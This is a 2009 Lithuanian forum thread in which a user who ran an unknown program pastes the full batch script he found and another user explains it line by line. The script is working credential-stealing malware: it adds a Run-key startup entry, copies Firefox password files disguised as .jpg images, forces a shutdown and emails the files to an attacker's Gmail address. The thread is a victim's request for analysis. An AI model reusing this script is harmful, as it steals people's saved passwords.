[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(./includes/bbcode.php): failed to open stream: No such file or directory
[phpBB Debug] PHP Warning: in file [ROOT]/viewtopic.php on line 22: include(): Failed opening './includes/bbcode.php' for inclusion (include_path='.:/opt/alt/php74/usr/share/pear')
Straipsniai.lt •Padekit del bat failo.
Puslapis 11

Padekit del bat failo.

Parašytas: 2009 02 13 21:54
Mesinikas
sveiki. as atsidariau neaisku exe faila ir isijunge kompas. Pasiseke kad ijungiau. tempuose radau b2e.dll ir crack.bat faila jame yra
@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v systemdriver /t REG_SZ /d HDD.bat /f > nul
start setup.exe
chdir %userprofile%\Application Data\Mozilla\Firefox\Profiles\*.default
copy key3.db C:\masterx.jpg
copy signons3.txt C:\phazex.jpg
copy key.db C:\masterx.jpg
copy signons.txt C:\phazex.jpg
shutdown -s -t 20 -c "system need restart"
"%systemroot%\device\febootimail" -FROM Masterx.topsecret@gmail.com -TO Masterx.topsecret@gmail.com -MSG "firefox" -ATTACH C:\phazex.jpg -ATTACH C:\masterx.jpg -SMTP gmail-smtp-in.l.google.com
ipconfig /release
exit

gal kas galit parasyt ka tas virusas padare?

Re: Padekit del bat failo.

Parašytas: 2009 02 19 16:18
aufliger
Tiksliai nežinau, bet pabandysiu paaiškinti.

Kodas: Pasirinkti visus

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v systemdriver /t REG_SZ /d HDD.bat /f > nul
Programa yra paleidžiama, kažkur sisteminiuose failuose, neva tai draiveriai kažkokie...

Kodas: Pasirinkti visus

%userprofile%\Application Data\Mozilla\Firefox\Profiles\*.default
Čia yra tavo naršyklės direkroija, t.y. kelias, kur yra saugomi/laikomi naršyklės failai, kurie yra vienaip ar kitaip susiję su tavo naršymu internete...

Iš ankščiau minėtos direktorijos yra kopinami failai (key3.db, sigons3.txt ir t.t):

Kodas: Pasirinkti visus

copy key3.db C:\masterx.jpg
copy signons3.txt C:\phazex.jpg
copy key.db C:\masterx.jpg
copy signons.txt C:\phazex.jpg
Turinys esantis tuose failuose (key3.db, sigons3.txt ir t.t) yra perkeliamas į masterx.jpg ir phazex.jpg . Po šios operacijos įvykdymo tau išmeta lenetelę, kad reikalingas kompiuterio perkrovimas. Po 20sek. tavo PC išsijungia.

Veliau, tie du failai (*.jpg) su pavogtu turiniu iš tavo PC, keliauja pas bat skripto kurėją, tiesiai į jo pašto dežutę. Štai ir viskas.
Na, nežinau ar čia teisingai paaiškinau tau, bet daugmaž viskas būtų taip...

Re: Padekit del bat failo.

Parašytas: 2009 02 20 19:55
Mesinikas
ok aciu. gerai kad neatjunge kokios peles arba boot.ini failo neistryne :D